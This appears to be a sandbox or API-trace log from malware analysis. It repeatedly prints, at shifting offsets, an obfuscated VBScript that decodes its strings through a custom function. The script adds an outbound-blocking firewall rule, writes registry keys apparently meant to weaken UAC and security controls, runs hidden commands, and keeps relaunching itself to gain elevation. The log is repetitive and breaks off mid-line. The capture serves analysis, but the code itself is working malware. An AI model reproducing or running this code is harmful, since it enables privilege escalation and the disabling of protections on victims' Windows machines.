bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.347] wcsncmp (_String1=", str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0226.347] wcsncmp (_String1=" str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.347] wcsncmp (_String1="str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.347] wcsncmp (_String1="tr1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.347] wcsncmp (_String1="r1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 